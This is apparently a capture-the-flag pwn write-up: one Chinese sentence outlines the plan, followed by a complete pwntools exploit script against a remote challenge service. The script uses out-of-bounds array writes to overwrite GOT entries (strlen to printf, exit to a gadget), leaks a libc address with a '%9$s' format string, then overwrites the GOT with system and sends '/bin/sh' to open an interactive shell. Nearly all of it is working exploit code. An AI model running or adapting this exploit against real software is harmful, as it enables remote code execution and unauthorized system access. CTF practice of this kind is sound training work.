利用两次数组越界,修改strlen@got表为printf,修改exit@got表为任意一个函数保证栈平衡即可,利用栈上布局泄露libc地址,再次利用数组越界修改got表为system即可弹shell
from pwn import * from LibcSearcher import * from struct import pack from ctypes import * # ld_path = "/mnt/hgfs/test/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/ld-2.27.so" # libc_path = "../libc/Ubuntu18-64.so" # p = process([ld_path, "../pwn"], env={"LD_PRELOAD":libc_path}) p=remote('node4.anna.nssctf.cn',28533) FILENAME='../pwn5' # p=process(FILENAME) elf=ELF(FILENAME) # libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') # libc=ELF('../libc/libc6_2.27-3ubuntu1.4_amd64.so') # libc = ELF('../libc.so.6') libc=ELF('../glibc-all-in-one-master/libs/2.31-0ubuntu9_amd64/libc-2.31.so') # context.arch='amd64' # gdb.attach(p,'b *0x40139C\n') #-448 def add(index,num): p.recvuntil(b'choice') p.sendline(b'2') p.recvuntil(b'one?') p.sendline(bytes(str(index),'utf-8')) p.recvuntil(b'number') if(num==-1):return p.sendline(bytes(str(num),'utf-8')) def show(): p.recvuntil(b'choice') p.sendline(b'1') puts_plt=0x4010C4 printf_plt=0x4010F4 pop_add=0x4012DD puts_got=elf.got['puts'] #-56 strlen -49 exit add(-49,pop_add) add(-56,printf_plt) add(0,-1) payload=b'%9$s'.ljust(8,b'\x00') payload+=p64(puts_got) p.sendline(payload) libc_add=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) libcbase=libc_add-libc.sym['puts'] system=libcbase+libc.sym['system'] # libc=LibcSearcher('puts',libc_add) # libcbase=libc_add-libc.dump('puts') success('libcbase'+hex(libcbase)) add(-56,system) add(0,-1) p.sendline(b'/bin/sh\x00') p.interactive()